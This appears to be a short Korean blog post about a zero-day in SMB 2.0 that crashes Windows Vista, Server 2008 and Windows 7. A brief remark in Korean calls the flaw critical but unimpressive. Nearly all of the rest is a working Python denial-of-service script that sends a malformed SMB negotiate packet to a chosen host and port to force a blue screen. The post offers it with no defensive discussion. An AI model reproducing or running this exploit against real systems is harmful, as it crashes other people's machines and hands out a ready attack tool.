Vista/2008/Windows 7 SMB2 BSOD 0Day

Vista / 2008 / Windows7 에서 SMB 2.0 에 대한 BSOD(Blue Screen Of Death) 취약점이 나왔네요.
어찌보면 크리티컬한 취약점이지만 그냥 그저 그러네요....

#!/usr/bin/python
# When SMB2.0 recieve a '&' char in the 'Process Id High' SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA

from time import sleep
from socket import *
import sys

if len(sys.argv) != 3:
    print 'Usage: smb-dos.py <hostname> <port>'
    sys.exit(1)

else:
    port = int(sys.argv[2])
    host = sys.argv[1], port

buff = (
'\x00\x00\x00\x90' # Begin SMB header: Session message
'\xff\x53\x4d\x42' # Server Component: SMB
'\x72\x00\x00\x00' # Negociate Protocol
'\x00\x00\x00\x00' # Operation 0x18 & sub 0xc853
'\x00\x31'# Process ID High: --> :) normal value should be '\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54'
'\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31'
'\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00'
'\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57'
'\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61'
'\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c'
'\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c'
'\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e'
'\x30\x30\x32\x00'
)
s = socket()
s.connect(host)
s.send(buff)
s.close()